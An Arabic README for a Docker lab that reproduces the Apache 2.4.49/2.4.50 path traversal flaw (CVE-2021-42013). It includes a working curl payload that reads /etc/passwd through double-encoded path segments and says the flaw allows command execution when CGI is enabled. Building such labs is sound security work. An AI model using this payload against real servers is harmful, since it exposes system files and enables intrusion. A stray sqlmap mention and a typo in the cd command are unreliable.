
CVE: 2021-42013 تم الاختبار على: 2.4.49 و 2.4.50 الوصف: ثغرات Path Traversal أو Remote Code Execution في Apache 2.4.49 و 2.4.50
يهدف هذا المشروع إلى تحويل ثغرة أمنية معينة إلى حاوية Docker. الهدف هو إنشاء بيئة معزولة يمكن من خلالها استغلال الثغرة واختبارها بطريقة آمنة.
Apache HTTP Server 2.4.50 - Remote Code Execution && Path Transversal
لتشغيل هذا المشروع، يجب أن يكون لديك على جهازك:
بعد تثبيت المتطلبات الأساسية، يمكنك استنساخ مستودع Git هذا على جهازك:
git clone https://github.com/cybfar/cve-2021-42013-httpd.git
cd Ccve-2021-42013-httpd
بمجرد دخولك إلى المجلد، قم بتنفيذ الأمر أدناه لإعداد البيئة المعرضة للخطر:
docker build -t apache-httpd-vuln .
docker run -p 8000:80 apache-httpd-vuln
ثم انتقل إلى التطبيق على العنوان http://localhost:8000 إذا سارت الأمور بشكل جيد، يجب أن ترى رسالة "It works"
تنفيذ هذا البايلود (payload) باستخدام curl أدناه يظهر أن الهدف معرض للخطر. سيقوم السكريبت بتوليد أمر sqlmap المناسب لاستغلال الثغرة
curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd
يمكن لهذا البايلود الوصول مباشرة إلى معلومات المستخدم في النظام دون موافقته.
بمجرد تفعيل mods cgi أو cgid على الخادم، ستسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية